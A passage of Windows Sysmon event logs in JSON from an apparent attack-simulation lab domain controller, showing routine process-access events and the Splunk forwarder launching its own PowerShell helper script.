05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00108A6E0100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00108A6E0100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.625\r\nProcessGuid: {A837DB8D-023D-5F25-0000-00104E680500}\r\nProcessId: 3108\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.625","ProcessGuid":"{A837DB8D-023D-5F25-0000-00104E680500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-00104E680500}\r\nTargetProcessId: 3108\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-00104E680500}","TargetProcessId":"3108","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-00104E680500}\r\nTargetProcessId: 3108\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-00104E680500}","TargetProcessId":"3108","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 